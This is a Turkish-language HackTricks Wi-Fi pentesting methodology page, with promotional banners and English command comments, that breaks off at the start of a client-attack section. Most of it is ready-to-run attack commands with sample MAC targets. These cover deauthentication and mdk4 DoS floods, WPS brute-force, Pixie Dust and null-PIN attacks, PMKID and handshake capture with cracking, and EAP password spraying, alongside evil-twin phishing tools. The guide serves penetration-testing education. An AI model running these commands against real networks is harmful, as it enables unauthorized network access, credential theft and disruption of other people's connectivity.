hacktricks/generic-methodologies-and-resources/pentesting-wifi

Wifi Pentest Etme

AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Kırmızı Takım Uzmanı) öğrenin!

HackTricks'i desteklemenin diğer yolları:

• Şirketinizi HackTricks'te reklamını görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARI'na göz atın!
• Resmi PEASS & HackTricks ürünlerini edinin
• Özel NFT'lerden oluşan koleksiyonumuz The PEASS Family'i keşfedin
• 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @hacktricks_live'ı takip edin.
• Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.

Deneyimli hackerlar ve ödül avcıları ile iletişim kurmak için HackenProof Discord sunucusuna katılın!

Hacking İçgörüleri
Hacking'in heyecanına ve zorluklarına dalmış içeriklerle etkileşim kurun

Gerçek Zamanlı Hack Haberleri
Hızlı tempolu hacking dünyasını gerçek zamanlı haberler ve içgörülerle takip edin

En Son Duyurular
Yeni ödül avları başlatma ve önemli platform güncellemeleri hakkında bilgilendirme alın

Bize Discord katılın ve bugün en iyi hackerlarla işbirliği yapmaya başlayın!

Wifi temel komutları

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis

EAPHammer, bir Wi-Fi saldırı aracıdır. Bu araç, EAP (Extensible Authentication Protocol) kullanarak Wi-Fi ağlarına saldırmak için tasarlanmıştır. EAPHammer, EAP protokolünün zayıflıklarını kullanarak ağa bağlı cihazların kimlik doğrulamasını etkisiz hale getirebilir ve saldırganın ağa erişim sağlamasını sağlayabilir. Bu araç, MITM (Man-in-the-Middle) saldırıları gerçekleştirmek için kullanılabilir ve ağ trafiğini izleyebilir, değiştirebilir veya çalabilir. EAPHammer, ağ güvenliği testleri ve pentestler için kullanılan bir araçtır.

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon is a multi-purpose tool designed for wireless penetration testing. It provides a wide range of features and functionalities to assist in the assessment of Wi-Fi networks. The tool is highly customizable and can be used for various tasks, including capturing handshakes, performing deauthentication attacks, conducting brute-force attacks, and launching evil twin attacks.

Airgeddon supports both passive and active scanning techniques to identify vulnerable Wi-Fi networks. It also includes built-in tools for cracking WPA/WPA2-PSK passwords and performing man-in-the-middle attacks. The tool is compatible with various Wi-Fi adapters and can be run on different operating systems, including Linux and Windows.

To use Airgeddon effectively, it is important to have a good understanding of Wi-Fi security protocols and techniques. Additionally, it is crucial to obtain proper authorization before conducting any wireless penetration testing activities.

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Docker ile airgeddon'u çalıştırın

Docker, airgeddon'u çalıştırmak için kullanabileceğiniz bir konteynerleme platformudur. Aşağıdaki adımları izleyerek airgeddon'u Docker üzerinde çalıştırabilirsiniz:

1. İlk olarak, Docker'ın sisteminizde yüklü olduğundan emin olun. Docker'ı yüklemek için resmi Docker web sitesini ziyaret edebilirsiniz.

2. Docker'ı başlatın ve çalışır durumda olduğunu doğrulayın.

3. Terminalinizi açın ve aşağıdaki komutu girin:

   docker run -it --net=host --privileged -v /tmp/.X11-unix:/tmp/.X11-unix -e DISPLAY=$DISPLAY --name airgeddon jgamblin/airgeddon
   

   Bu komut, Docker konteynerini oluşturacak ve airgeddon'u içinde çalıştıracaktır.

4. airgeddon'u Docker konteynerinde kullanmaya başlayabilirsiniz. Konteynerin içindeki terminali kullanarak airgeddon komutlarını çalıştırabilirsiniz.

   Örneğin, aşağıdaki komutu kullanarak airgeddon'u başlatabilirsiniz:

   airgeddon
   

   Bu şekilde, airgeddon'u Docker üzerinde çalıştırabilir ve Wi-Fi pentesting işlemlerini gerçekleştirebilirsiniz.

Not: airgeddon, Wi-Fi ağlarını pentest etmek için kullanılan bir araçtır. Bu aracı yasal ve etik sınırlar içinde kullanmalısınız.

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

wifiphisher

Evil Twin, KARMA ve Bilinen Beacon saldırılarını gerçekleştirebilir ve ardından ağın gerçek şifresini elde etmek veya sosyal ağ kimlik bilgilerini yakalamak için bir phishing şablonu kullanabilir.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Bu araç, WPS/WEP/WPA-PSK saldırılarını otomatikleştirir. Otomatik olarak şunları yapar:

• Arayüzü izleme moduna ayarlar
• Olası ağları tarar - ve kurban(ları) seçmenize izin verir
• Eğer WEP ise - WEP saldırıları başlatır
• Eğer WPA-PSK ise
• Eğer WPS ise: Pixie dust saldırısı ve brute-force saldırısı (brute-force saldırısı uzun sürebilir, dikkatli olun). Boş PIN veya veritabanı/üretilmiş PIN'leri denemez.
• AP'den PMKID'yi yakalamaya çalışır ve kırar
• AP'nin istemcilerini deauthenticate etmeye çalışır ve bir handshake yakalar
• Eğer PMKID veya Handshake varsa, top5000 şifrelerini kullanarak brute-force yapmaya çalışır.

Saldırı Özeti

• DoS
• Deauthentication/disassociation -- Herkesi (veya belirli bir ESSID/İstemci) bağlantısını keser
• Rastgele sahte AP'ler -- Ağları gizler, tarayıcıları çökertebilir
• AP'yi aşırı yükler -- AP'yi kapatmaya çalışır (genellikle çok faydalı değildir)
• WIDS -- IDS ile oynar
• TKIP, EAPOL -- Bazı AP'leri DoS yapmak için özel saldırılar
• Kırma
• WEP kırma (birkaç araç ve yöntem)
• WPA-PSK
• WPS pin "Brute-Force"
• WPA PMKID brute-force
• [DoS +] WPA handshake yakalama + Kırma
• WPA-MGT
• Kullanıcı adı yakalama
• Brute-force Kimlik Bilgileri
• Kötü İkiz (DoS ile veya olmadan)
• Açık Kötü İkiz [+ DoS] -- Captive portal kimlik bilgilerini yakalamak ve/veya LAN saldırıları gerçekleştirmek için kullanışlı
• WPA-PSK Kötü İkiz -- Şifreyi bildiğinizde ağ saldırıları için kullanışlı
• WPA-MGT -- Şirket kimlik bilgilerini yakalamak için kullanışlı
• KARMA, MANA, Loud MANA, Known beacon
• + Açık -- Captive portal kimlik bilgilerini yakalamak ve/veya LAN saldırıları gerçekleştirmek için kullanışlı
• + WPA -- WPA handshakelerini yakalamak için kullanışlı

DOS

Deauthentication Paketleri

Buradan alınan açıklama: buradan:.

Deauthentication saldırıları, Wi-Fi hacklemede yaygın bir yöntem olup, "yönetim" çerçevelerini sahte olarak oluşturarak cihazları bir ağdan zorla ayırmayı içerir. Bu şifrelenmemiş paketler, istemcilerin gerçek ağdan geldiğine inanmasını sağlar ve saldırganların WPA handshakelerini kırma amacıyla toplamasına veya ağ bağlantılarını sürekli olarak kesmesine olanak tanır. Bu basitliğiyle dikkat çeken taktik, yaygın olarak kullanılır ve ağ güvenliği için önemli sonuçları vardır.

Aireplay-ng kullanarak Deauthentication

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0, deauthentication anlamına gelir
• 1, gönderilecek deauth sayısıdır (istediğiniz kadar gönderebilirsiniz); 0, sürekli olarak gönderilmesi anlamına gelir
• -a 00:14:6C:7E:40:80, erişim noktasının MAC adresidir
• -c 00:0F:B5:34:30:30, deauthenticate edilecek istemcinin MAC adresidir; bu belirtilmezse yayın deauthentication gönderilir (her zaman çalışmayabilir)
• ath0, arayüz adıdır

Ayrılma Paketleri

Ayrılma paketleri, Wi-Fi ağlarında kullanılan yönetim çerçevelerinden biri olan deauthentication paketlerine benzer. Bu paketler, bir cihazın (örneğin bir dizüstü bilgisayar veya akıllı telefon) ve bir erişim noktası (AP) arasındaki bağlantıyı kesmek için kullanılır. Ayrılma ve deauthentication arasındaki temel fark, kullanım senaryolarındadır. AP, ağdan açıkça yanlış cihazları kaldırmak için deauthentication paketleri yayınlarken, ayrılma paketleri genellikle AP'nin kapanması, yeniden başlatılması veya yer değiştirmesi durumunda gönderilir ve bu nedenle bağlı tüm düğümlerin bağlantısının kesilmesi gerekmektedir.

Bu saldırı, mdk4 (mod "d") ile gerçekleştirilebilir:

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

mdk4 ile daha fazla DOS saldırısı

Burada bulunmaktadır.

SALDIRI MODU b: Beacon Flooding

Sahte erişim noktalarını müşterilere göstermek için beacon çerçeveleri gönderir. Bu bazen ağ tarayıcılarını ve hatta sürücüleri çökerte bilir!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

SALDIRI MODU a: Kimlik Doğrulama Hizmet Dışı Bırakma

Erişilebilir tüm Erişim Noktalarına (AP'ler) kimlik doğrulama çerçeveleri göndermek, özellikle birçok istemci dahil olduğunda bu AP'leri aşırı yükleyebilir. Bu yoğun trafiğe bağlı olarak sistem kararsız hale gelebilir ve bazı AP'lerin donmasına veya hatta sıfırlanmasına neden olabilir.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

SALDIRI MODU p: SSID Sondalama ve Bruteforcing

Erişim Noktalarını (AP'ler) sondalama, bir SSID'nin doğru bir şekilde ortaya çıkıp çıkmadığını kontrol eder ve AP'nin menzilini doğrular. Bu teknik, bir kelime listesiyle veya kelime listesi olmadan gizli SSID'leri bruteforce etmek ile birleştirilerek gizli ağları tespit etmek ve erişmek için yardımcı olur.

SALDIRI MODU m: Michael Karşı Önlemler Sömürüsü

Rastgele veya yinelenen paketlerin farklı QoS kuyruklarına gönderilmesi, TKIP AP'lerinde Michael Karşı Önlemlerini tetikleyebilir ve bir dakikalık AP kapanmasına neden olabilir. Bu yöntem, etkili bir Hizmet Reddi (DoS) saldırı taktiğidir.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

SALDIRI MODU e: EAPOL Başlatma ve Oturum Kapatma Paketi Enjeksiyonu

Bir AP'yi EAPOL Başlatma çerçeveleriyle sel basmak, sahte oturumlar oluşturarak AP'yi aşırı yükleyerek ve meşru istemcileri engelleyerek ağ hizmetini kesintiye uğratır. Alternatif olarak, sahte EAPOL Oturum Kapatma mesajları enjekte ederek istemcileri zorla bağlantıyı keser, her iki yöntem de ağ hizmetini etkili bir şekilde bozar.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

SALDIRI MODU s: IEEE 802.11s ağları için saldırılar

Ağ bağlantısı yönetimi ve yönlendirme üzerinde çeşitli saldırılar yapılır.

SALDIRI MODU w: WIDS Karışıklığı

Müşterileri birden fazla WDS düğümüne veya sahte sahte AP'lere bağlamak, Sızma Tespit ve Önleme Sistemlerini manipüle edebilir ve karışıklık yaratarak potansiyel sistem kötüye kullanımına neden olabilir.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

SALDIRI MODU f: Paket Fuzzer

Paket manipülasyonu için çeşitli paket kaynakları ve kapsamlı bir değiştirici seti sunan bir paket fuzzer.

Airggedon

Airgeddon, önceki yorumlarda önerilen çoğu saldırıyı sunar:

WPS

WPS (Wi-Fi Protected Setup), cihazları bir yönlendiriciye bağlama sürecini basitleştirerek, WPA veya WPA2 Personal ile şifrelenmiş ağlar için kurulum hızını ve kolaylığını artırır. Kolayca tehlikeye atılabilen WEP güvenliği için etkisizdir. WPS, 11.000 kombinasyon olasılığına sahip sınırlı sayıda bir 8 haneli PIN kullanır, bu nedenle brute-force saldırılara karşı savunmasızdır.

WPS Brute Force

Bu işlemi gerçekleştirmek için 2 ana araç vardır: Reaver ve Bully.

• Reaver, WPS'ye karşı güçlü ve pratik bir saldırı olması için tasarlanmıştır ve çeşitli erişim noktaları ve WPS uygulamalarıyla test edilmiştir.
• Bully, C dilinde yazılmış WPS brute force saldırısının yeni bir uygulamasıdır. Orijinal reaver koduna göre birkaç avantaja sahiptir: daha az bağımlılık, geliştirilmiş bellek ve işlemci performansı, doğru endianness işlemesi ve daha sağlam bir seçenek kümesi.

Saldırı, özellikle ilk dört haneliğin ve son hanelerin bir checksum olarak rol oynamasının WPS PIN'inin zayıflıklarını sömürerek brute-force saldırısını kolaylaştırır. Bununla birlikte, saldırganların MAC adreslerini engellemek gibi brute-force saldırılara karşı savunmalar, saldırıyı sürdürebilmek için MAC adresi dönüşümü gerektirir.

Bully veya Reaver gibi araçlarla WPS PIN'i elde edildikten sonra, saldırgan WPA/WPA2 PSK'yı çıkarabilir ve sürekli ağ erişimi sağlayabilir.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Akıllı Kaba Kuvvet

Bu geliştirilmiş yaklaşım, bilinen zafiyetleri kullanarak WPS PIN'lerini hedefler:

1. Önceden Keşfedilmiş PIN'ler: Belirli üreticilerin bilinen PIN'lerini içeren bir veritabanını kullanın. Bu veritabanı, MAC adreslerinin ilk üç oktetini bu üreticiler için muhtemel PIN'lerle ilişkilendirir.
2. PIN Oluşturma Algoritmaları: AP'nin MAC adresine dayanarak WPS PIN'lerini hesaplayan ComputePIN ve EasyBox gibi algoritmaları kullanın. Arcadyan algoritması, PIN oluşturma sürecine bir katman ekleyen bir cihaz kimliği gerektirir.

WPS Pixie Dust saldırısı

Dominique Bongard, bazı Erişim Noktalarında (AP'ler) gizli kodların, yani nonce'ların (E-S1 ve E-S2) oluşturulmasıyla ilgili bir hata keşfetti. Bu nonce'lar çözülebilirse, AP'nin WPS PIN'inin kırılması kolay hale gelir. AP, sahte (dolandırıcı) bir AP olmadığını kanıtlamak için özel bir kod (hash) içinde PIN'i ortaya koyar. Bu nonce'lar, WPS PIN'inin bulunduğu "kasanın" kilidini açmak için "anahtar" görevi görür. Daha fazla bilgiye buradan ulaşılabilir.

Basit bir ifadeyle, sorun şudur ki bazı AP'ler, bağlantı sürecinde PIN'i şifrelemek için yeterince rastgele olmayan anahtarlar kullanmamıştır. Bu, PIN'in ağ dışından tahmin edilebilir hale gelmesine neden olur (çevrimdışı kaba kuvvet saldırısı).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Null Pin saldırısı

Bazı kötü tasarlanmış sistemler, oldukça nadir olan bir şekilde, erişim için boş veya mevcut olmayan bir PIN olan Null PIN'e izin verir. Reaver aracı, Bully'den farklı olarak, bu zayıflığı test etme yeteneğine sahiptir.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Tüm önerilen WPS saldırıları kolayca airgeddon kullanılarak gerçekleştirilebilir.

• 5 ve 6, özel PIN'inizi denemenizi sağlar (varsa)
• 7 ve 8, Pixie Dust saldırısını gerçekleştirir
• 13, NULL PIN'i test etmenizi sağlar
• 11 ve 12, seçilen AP ile ilgili PIN'leri mevcut veritabanlarından toplar ve ComputePIN, EasyBox ve isteğe bağlı olarak Arcadyan (önerilen, neden olmasın?) kullanarak olası PIN'ler üretir
• 9 ve 10, her olası PIN'i test eder

WEP

Artık kırık ve kullanılmayan bir yöntem. Sadece airgeddon'un bu tür korumayı hedefleyen "All-in-One" adlı bir WEP seçeneği olduğunu bilin. Benzer seçenekler sunan daha fazla araç bulunmaktadır.

---

Deneyimli hackerlar ve ödül avcıları ile iletişim kurmak için HackenProof Discord sunucusuna katılın!

Hacking Insights
Hacking'in heyecanını ve zorluklarını inceleyen içeriklerle etkileşime geçin

Gerçek Zamanlı Hack Haberleri
Hızlı tempolu hacking dünyasını gerçek zamanlı haberler ve içgörülerle takip edin

En Son Duyurular
Yeni ödül avları başlatma ve önemli platform güncellemeleri hakkında bilgi sahibi olun

Bize katılın Discord ve bugün en iyi hackerlarla işbirliği yapmaya başlayın!

---

WPA/WPA2 PSK

PMKID

2018 yılında, hashcat açıkladı ki bu yeni bir saldırı yöntemidir ve sadece bir tek paket gerektirir ve hedef AP'ye bağlı herhangi bir istemciye ihtiyaç duymaz - sadece saldırgan ile AP arasındaki etkileşim.

Birçok modern yönlendirici, birleşme sırasında ilk EAPOL çerçevesine isteğe bağlı bir alan ekler, bu da Robust Security Network olarak bilinir. Bu, PMKID'yi içerir.

Orijinal gönderi açıkladığı gibi, PMKID bilinen veriler kullanılarak oluşturulur:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Verilen "PMK Adı" sabit olduğunda, AP ve istasyonun BSSID'sini biliyoruz ve PMK, tam 4 yönlü bir el sıkışmadan alınanla aynıdır, hashcat bu bilgiyi kullanarak PSK'yı kırmak ve parolayı kurtarmak için kullanılabilir!

Bu bilgileri toplamak ve yerel olarak şifreyi bruteforce etmek için şunları yapabilirsiniz:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKIDs yakalandığında, bunlar konsolda gösterilecek ve aynı zamanda /tmp/attack.pcap içine kaydedilecektir. Şimdi, yakalamayı hashcat/john formatına dönüştürün ve kırın:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Doğru bir karmaşa formatının 4 parçadan oluştuğunu unutmayın, örneğin: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Eğer sizinkinde sadece 3 parça varsa, o zaman geçersizdir (PMKID yakalama geçerli değildi).

hcxdumptool ayrıca el sıkışmalarını da yakalar (şöyle bir şey görünecektir: MP:M1M2 RC:63258 EAPOLTIME:17091). El sıkışmalarını cap2hccapx kullanarak hashcat/john formatına dönüştürebilirsiniz.

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Bu aracı kullanarak yakalanan bazı el sıkışmaların, doğru şifreyi bile bilse bile kırılamadığını fark ettim. Mümkünse el sıkışmalarını geleneksel yöntemle de yakalamayı veya bu aracı kullanarak birkaç el sıkışma yakalamayı öneririm.

El sıkışması yakalama

WPA/WPA2 ağlarına yönelik bir saldırı, bir el sıkışması yakalayarak şifreyi çevrimdışı kırmayı deneyerek gerçekleştirilebilir. Bu işlem, belirli bir ağın ve BSSID'nin belirli bir kanal üzerindeki iletişimini izlemeyi içerir. İşte basitleştirilmiş bir rehber:

1. Hedef ağın BSSID, kanal ve bağlı bir istemci'sini belirleyin.
2. Belirtilen kanal ve BSSID üzerinde ağ trafiğini izlemek için airodump-ng kullanın ve bir el sıkışması yakalamayı umun. Komut şu şekilde olacaktır:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. Bir el sıkışmasını yakalama şansını artırmak için istemciyi geçici olarak ağdan ayırarak yeniden kimlik doğrulama yapmasını zorlayın. Bu, aireplay-ng komutunu kullanarak istemciye dekimlik paketleri göndererek yapılabilir:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Not: İstemci deauthentikasyon yapıldığı için farklı bir AP'ye veya diğer durumlarda farklı bir ağa bağlanmaya çalışabilir.

airodump-ng içinde bir el sıkışma bilgisi göründüğünde, bu el sıkışmanın yakalandığı anlamına gelir ve dinlemeyi durdurabilirsiniz:

El sıkışma yakalandığında, aircrack-ng ile kırabilirsiniz:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Dosyada el sıkıştırma kontrolü yapın

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark is a command-line tool that is part of the Wireshark network protocol analyzer. It allows you to capture and analyze network traffic in real-time. With tshark, you can capture packets from various network interfaces, apply filters to capture specific types of traffic, and save the captured data to a file for further analysis. It supports a wide range of protocols and provides detailed information about each packet, including source and destination IP addresses, port numbers, protocol types, and payload data. tshark is a powerful tool for network troubleshooting, security analysis, and protocol development.

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Eğer bu araç, tamamlanmamış bir ESSID el sıkışmasını tamamlanmış olanından önce bulursa, geçerli olanı tespit etmeyecektir.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Kurumsal (Yönetim)

Kurumsal WiFi yapılandırmalarında, farklı güvenlik seviyeleri ve yönetim özellikleri sunan çeşitli kimlik doğrulama yöntemleriyle karşılaşacaksınız. airodump-ng gibi araçları kullanarak ağ trafiğini incelediğinizde, bu kimlik doğrulama türleri için tanımlayıcılar fark edebilirsiniz. Bazı yaygın yöntemler şunları içerir:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Bu yöntem, EAP-PEAP içinde donanım tokenleri ve tek kullanımlık şifreleri destekler. MSCHAPv2'nin aksine, eşleme meydan okuması kullanmaz ve şifreleri düz metin olarak erişim noktasına gönderir, bu da geriye dönük saldırılar için bir risk oluşturur.

2. EAP-MD5 (Message Digest 5):

• İstemciden MD5 şifresinin hash'ini göndermeyi içerir. Sözlük saldırılarına karşı savunmasız olması, sunucu kimlik doğrulamasının olmaması ve oturum özel WEP anahtarları oluşturamaması nedeniyle önerilmez.

3. EAP-TLS (Transport Layer Security):

• Hem istemci tarafı hem de sunucu tarafı sertifikalarını kimlik doğrulama için kullanır ve iletişimi güvence altına almak için kullanıcı tabanlı ve oturum tabanlı WEP anahtarları oluşturabilir.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Şifreli bir tünel aracılığıyla karşılıklı kimlik doğrulama sağlar ve dinamik, kullanıcı tabanlı, oturum tabanlı WEP anahtarları türetilmesini sağlar. Sadece sunucu tarafı sertifikalarını gerektirirken, istemciler kimlik bilgilerini kullanır.

5. PEAP (Protected Extensible Authentication Protocol):

• EAP ile benzer şekilde korumalı iletişim için bir TLS tüneli oluşturur. Tünel tarafından sağlanan koruma nedeniyle daha zayıf kimlik doğrulama protokollerinin EAP üzerinde kullanılmasına izin verir.

• PEAP-MSCHAPv2: Genellikle PEAP olarak adlandırılır, zayıf MSCHAPv2 meydan okuma/yanıt mekanizmasını koruyucu bir TLS tüneliyle birleştirir.
• PEAP-EAP-TLS (veya PEAP-TLS): EAP-TLS'ye benzer, ancak sertifikaları değiş tokuş etmeden önce bir TLS tüneli başlatır ve ek bir güvenlik katmanı sunar.

Bu kimlik doğrulama yöntemleri hakkında daha fazla bilgiye buradan ve buradan ulaşabilirsiniz.

Kullanıcı Adı Yakalama

https://tools.ietf.org/html/rfc3748#page-27 adresini okuyarak, EAP kullandığınızda "Kimlik" mesajlarının desteklenmesi gerektiği ve kullanıcı adının "Yanıt Kimliği" mesajlarında açık olarak gönderileceği görülüyor.

En güvenli kimlik doğrulama yöntemlerinden biri olan PEAP-EAP-TLS bile, EAP protokolünde gönderilen kullanıcı adının yakalanması mümkündür. Bunun için bir kimlik doğrulama iletişimi yakalayın (airodump-ng'yi bir kanal içinde başlatın ve aynı arayüzde wireshark'ı kullanın) ve paketleri eapol ile filtreleyin.
"Yanıt, Kimlik" paketi içinde istemcinin kullanıcı adı görünecektir.

Anonim Kimlikler

Kimlik gizleme, hem EAP-PEAP hem de EAP-TTLS tarafından desteklenir. Bir WiFi ağı bağlamında, bir EAP-Kimlik isteği genellikle erişim noktası (AP) tarafından ilişkilendirme süreci sırasında başlatılır. Kullanıcı anonimliğinin korunmasını sağlamak için, kullanıcının cihazındaki EAP istemcisinin yanıtı, isteği işlemek için başlangıç RADIUS sunucusunun gereksinim duyduğu temel bilgileri içerir. Bu kavram aşağıdaki senaryolarla açıklanmaktadır:

• EAP-Kimlik = anonim

• Bu senaryoda, tüm kullanıcılar kullanıcı kimlikleri olarak takma ad "anonim" kullanır. Başlangıç RADIUS sunucusu, PEAP veya TTLS protokolünün sunucu tarafını yönetmekle sorumludur. İç (korunan) kimlik doğrulama yöntemi, yerel olarak işlenebilir veya uzak (ev) RADIUS sunucusuna devredilebilir.

• EAP-Kimlik = anonim@realm_x

• Bu durumda, farklı alanlardan kullanıcılar kimliklerini gizlerken ilgili alanlarını belirtirler. Bu, başlangıç RADIUS sunucusunun EAP-PEAP veya EAP-TTLS isteklerini ev alanlarındaki RADIUS sunucularına yönlendirmesine olanak tanır. Bu sunucular PEAP veya TTLS sunucusu olarak hareket eder. Başlangıç RADIUS sunucusu yalnızca bir RADIUS iletim düğümü olarak çalışır.

• Alternatif olarak, başlangıç RADIUS sunucusu EAP-PEAP veya EAP-TTLS sunucusu olarak işlev görebilir ve korunan kimlik doğrulama yöntemini ya kendisi işleyebilir ya da başka bir sunucuya iletebilir. Bu seçenek, farklı alanlar için farklı politikaların yapılandırılmasını kolaylaştırır.

EAP-PEAP'ta, PEAP sunucusu ve PEAP istemcisi arasında TLS tüneli kurulduktan sonra, PEAP sunucusu bir EAP-Kimlik isteği başlatır ve bunu TLS tüneli aracılığıyla ileterek gönderir. İstemci, bu ikinci EAP-Kimlik isteğine bir EAP-Kimlik yanıtı göndererek şifrelenmiş tünel aracılığıyla kullanıcının gerçek kimliğini içeren bir EAP-Kimlik yanıtı gönderir. Bu yaklaşım, 802.11 trafiğini dinleyen herhangi bir kişiye kullanıcının gerçek kimliğinin ifşa edilmesini etkili bir şekilde önler.

EAP-TTLS biraz farklı bir prosedür izler. EAP-TTLS ile istemci genellikle PAP veya CHAP kullanarak kimlik doğrulama yapar ve bunu TLS tüneliyle güvence altına alır. Bu durumda, istemci, tünel kurulduktan sonra gönderilen ilk TLS ileti içinde bir Kullanıcı Adı özniteliği ve bir Şifre veya CHAP-Şifre özniteliği içerir.

Seçilen protokole bakılmaksızın, PEAP/TTLS sunucusu, TLS tüneli kurulduktan sonra kullanıcının gerçek kimliğini öğrenir. Gerçek kimlik, kullanıcı@alan veya sadece kullanıcı olarak temsil edilebilir. PEAP/TTLS sunucusu kullanıcının kimlik doğrulamasından da sorumluysa, şimdi kullanıcının kimliğine sahiptir ve TLS tüneliyle korunan kimlik doğrulama yöntemine devam eder. Alternatif olarak, PEAP/TTLS sunucusu kullanıcının ev RADIUS sunucusuna yeni bir RADIUS isteği iletebilir. Bu yeni RADIUS isteği PEAP veya TTLS protokol katmanını içermez. Korunan kimlik doğrulama yöntemi EAP ise, iç EAP mesajları EAP-PEAP veya EAP-TTLS sarmalayıcısı olmadan ev RADIUS sunucusuna iletilir. Giden RADIUS iletiminin Kullanıcı Adı özniteliği, gelen RADIUS isteğindeki anonim Kullanıcı Adı'nın yerine kullanıcının gerçek kimliğini içerir. Korunan kimlik doğrulama yöntemi PAP veya CHAP ise (yalnızca TTLS tarafından desteklenir), TLS yükünden çıkarılan Kullanıcı Adı ve diğer kimlik doğrulama öznitelikleri, gelen RADIUS isteğindeki anonim Kullanıcı Adı ve TTLS EAP-İleti özniteliklerini yerine koyan çıkış RADIUS iletimine yerleştirilir.

Daha fazla bilgi için buraya bakabilirsiniz.

EAP-Bruteforce (parola spreyi)

Eğer istemcinin bir kullanıcı adı ve parola kullanması bekleniyorsa (EAP-TLS bu durumda geçerli olmayacaktır), o zaman bir kullanıcı adı listesi (sonraki bölüme bakın) ve parolaları elde etmeye çalışabilir ve air-hammer kullanarak erişimi brute force yöntemiyle deneyebilirsiniz.

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

Bu saldırıyı eaphammer kullanarak da gerçekleştirebilirsiniz:

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

İstemci saldırıları Teorisi

Ağ Seçimi ve Gezinme

• 802.11 protokolü, bir istasyonun Genişletilmiş Hizmet Seti'ne (ESS) nasıl katıldığını tanımlar, ancak bir ESS veya içindeki bir erişim noktası (AP) seçimi için kriterleri belirtmez.
